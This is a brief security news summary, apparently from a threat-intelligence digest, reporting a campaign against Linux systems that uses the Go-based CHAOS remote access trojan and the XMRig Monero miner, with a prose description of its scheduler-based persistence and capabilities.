"Cryptocurrency Mining Campaign Hits Linux Users With Go-Based CHAOS Malware"

An open-source Remote Access Trojan (RAT) called CHAOS was used in a cryptocurrency mining attack against the Linux operating system. Trend Micro discovered the threat in November 2022, and it has remained nearly the same in all other aspects, including terminating competing malware, and security software, and deploying the Monero (XMR) cryptocurrency miner. According to researchers David Fiser and Alfredo Oliveira, the malware achieves persistence by modifying a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin. This is followed by the download of next-stage payloads, which include the XMRig miner and the Go-based CHAOS RAT. According to the cybersecurity firm, the main downloader script and additional payloads are hosted in multiple locations to ensure that the campaign stays active and new infections continue. Once downloaded and launched, the CHAOS RAT sends detailed system metadata to a remote server. It has the ability to perform file operations, take screenshots, shut down and restart the computer, and open arbitrary URLs. This article continues to discuss the use of the Go-based CHAOS RAT in cryptocurrency mining attacks targeting Linux users. 

THN reports "Cryptocurrency Mining Campaign Hits Linux Users With Go-Based CHAOS Malware"